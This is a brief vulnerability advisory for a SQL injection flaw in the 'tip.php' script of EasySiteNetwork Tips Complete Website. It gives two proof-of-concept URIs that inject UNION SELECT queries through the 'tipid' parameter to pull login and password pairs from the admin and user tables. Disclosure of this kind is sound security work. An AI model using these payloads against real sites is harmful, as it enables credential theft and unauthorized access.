EasySiteNetwork Tips Complete Website 'tip.php' SQL Injection Vulnerability

EasySiteNetwork Tips Complete Website 'tip.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*
http://www.example.com/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*